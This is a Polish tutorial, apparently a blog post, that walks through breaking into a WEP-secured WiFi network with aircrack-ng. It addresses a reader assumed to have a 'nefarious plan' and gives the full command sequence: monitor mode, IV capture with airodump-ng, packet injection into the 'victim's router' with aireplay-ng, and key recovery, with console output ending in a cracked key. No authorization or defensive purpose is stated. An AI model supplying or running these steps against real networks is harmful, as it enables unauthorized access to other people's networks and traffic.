[WiFi] – WEP Cracking

Skoro już trafiłeś na tę stronę to pewnie masz jakiś niecny plan.

To zobacz, jak łatwo jest włamać się do sieci WiFi zabezpieczanej przez WEP.

Zgaduję, że zamierzasz włamać się do sieci WiFi (czyt. łaj-faj), zabezpieczonej protokołem z kluczem WEP, ale nie masz zielonego pojęcia jak się do tego zabrać.

Co musisz mieć przygotowane:

  • Linux
  • aircrack-ng
  • karta WiFi

Przejdź na konto root.

Wpisz w konsoli:

airmon-ng start <interface>

Gdzie <inf> to interface sieciowy Twojej karty WLAN. U mnie to wygląda tak:

# airmon-ng start wlan0
 
Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
 
PID Name
1336 avahi-daemon
1337 avahi-daemon
1342 NetworkManager
1457 wpa_supplicant
32353 dhclient
32426 dhclient
Process with PID 32353 (dhclient) is running on interface wlan0
Process with PID 32426 (dhclient) is running on interface wlan1
Interface Chipset Driver
 
wlan0 Atheros ath9k - [phy0]
(monitor mode enabled on mon0)
wlan1 RTL8187 rtl8187 - [phy1]

 

Ty pewnie będziesz miał coś innego na wyjściu po wykonaniu tej komendy, ale nie przejmuj się.

Z powyższego możesz odczytać, że tryb monitor został włączony na inferface mon0, co jest kluczowe do ataku. Sporo osób nie rozumie skąd wziął się ten interface, nie w Twoim komputerze nie pojawiła się magicznie nowa karta sieciowa, chociaż tak, właściwie to pojawiła się, ale jest ona wirtualna, utworzona jest na tym samym chipsecie, na którym jest fizyczny interface.

Teraz co musisz zrobić? Wykorzystać ten wirtualny interface do przechwycenia pakietów.

Można tego z łatwością dokonać za pomocą programu, który wchodzi w skład pakietu aircrack-ng, nazwya się on airodump-ng, służy do przechwytywania każdego pakietu w eterze w zasięgu Twojej karty sieciowej. Nie będę się tutaj zagłębiał w to jak działa program ani w jego dokumentację. Musisz wiedzieć tylko co się stanie gdy wpiszesz

airodump-ng -t WEP -c 1 --ivs -w NASA_WEP

Otóż stanie się to:

  • program będzie działał na interface mon0
  • będzie wyświetlał tylko te sieci, które są “zabezpieczone” przez WEP
  • tylko te, które działają na kanale 1
  • będzie zapisywał pakiety IVS do pliku o nazwie NASA_WEP

 

Zostawiasz przechwytywanie na jakiś czas ma się zebrać duża liczba w tabeli “#Data“, w niej zapisane są części klucza, który chcesz złamać, im więcej ich masz tym szybciej złamiesz kluczyk.

 

No dobra, załóżmy że trochę ich już masz. Wejdź w drugą konsolę.

Program aircrack-ng służy do odzyskiwania hasła zapisanego w przechwyconych pakietach. Musisz go odpalić wskazując mu gdzie jest plik z przechwyconymi danymi, żeby mógł zacząć działać.

# aircrack-ng NASA_WEP-01.ivs 
Opening NASA_WEP-01.ivs
Read 1539 packets.
# BSSID ESSID Encryption
 
1 00:04:ED:A3:80:11 NASA WEP (1538 IVs)
 
Choosing first network as target.
 
Opening NASA_WEP-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1538 ivs.
 
Aircrack-ng 1.0
 
[00:00:04] Tested 166831 keys (got 1538 IVs)
 
KB depth byte(vote)
0 29/ 30 97(2308) 15(2304) D0(2304) BB(2272) 4A(2232) 4B(2232)
1 8/ 12 95(2632) 29(2600) 8E(2600) DE(2600) 65(2564) 7A(2564)
2 12/ 2 19(2560) 27(2488) A6(2488) BC(2488) 2C(2452) 51(2452)
3 32/ 3 D7(2196) 19(2192) 56(2192) 0D(2160) 83(2160) CB(2160)
4 9/ 10 61(2852) DA(2820) 03(2816) 55(2748) 3A(2564) 19(2560)
 
Failed. Next try with 5000 IVs.

No niestety, minuta przechwytywania pakietów to za mało. Musisz jeszcze chwilę poczekać.

Aircrack-ng 1.0
[00:00:06] Tested 1409955 keys (got 5040 IVs)
 
KB depth byte(vote)
0 95/ 97 E2(5448) 42(5412) 5D(5380) 03(5376) AA(5376) 3E(5372)
1 46/ 1 16(5960) 09(5928) CB(5928) 43(5924) 55(5892) B0(5892)
2 26/ 92 A0(6184) F6(6148) C1(6108) F3(6076) 62(6072) E6(6068)
3 38/ 3 E9(5996) D3(5960) D6(5960) F4(5928) 2F(5924) C4(5924)
4 2/ 8 51(7980) AA(7652) 35(7212) E8(7132) 37(7096) 76(6916)
 
Failed. Next try with 10000 IVs.

 

Nie udało się. Mam za mało danych potrzebnych do złamania klucza.

Trzeba pomóc airodumpowi żeby szybciej chwytał te pakiety, można to zrobić za pomocą airepley-ng, służy on do wstrzykiwania pakietów do określonego AP, w celu zebrania większej ilości pakietów z kluczem.

aireplay-ng -3 -b MAC_ADDR_AP mon0

Powyższym poleceniem zaczniesz wstrzykiwać pakiety do routera ofiary. MAC_ADDR_AP weźmiesz z okienka airodump’a, jest to adres MAC docelowej sieci.

Różne poradniki sugerują różne wymagane ilości danych potrzebnych do złamania klucza. Jednak jest to zależne od sieci. Co chwilę można przecież sprawdzać postęp w pracy, nie czekając do tych 20/k/35k/50k IVsów.

Po kilku minutach aircrac-ng zostaje odpalony ponownie, oto efekt jego działania:

# aircrack-ng  NASA_WEP-01.ivs 
Opening NASA_WEP-01.ivs
Read 22707 packets.
# BSSID ESSID Encryption
 
1 00:04:ED:A3:80:11 NASA WEP (22706 IVs)
 
Choosing first network as target.
 
Opening NASA_WEP-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 22706 ivs.
 
Aircrack-ng 1.0
 
[00:02:23] Tested 15634 keys (got 25939 IVs)
 
KB depth byte(vote)
0 10/ 12 68(31464) 97(31460) 3C(31424) 6A(31336) 1B(31232) 17(31136)
1 3/ 12 61(32960) F1(32852) 58(32736) BB(32480) 37(32448) 31(32440)
2 1/ 5 78(37040) EE(34204) 32(33476) 92(33212) D5(32780) B1(31676)
3 0/ 2 65(39072) 54(34420) 3A(32792) 71(32560) BE(32492) D7(32188)
4 9/ 11 AC(31544) 0A(31452) C3(31288) 80(31232) C5(31192) 40(31032)
 
KEY FOUND! [ <strong>68:61:78:65:64</strong> ] (ASCII: haxed )
Decrypted correctly: 100%

Jak widać kluczem do sieci jest: haxed.

[Total: 0    Average: 0/5]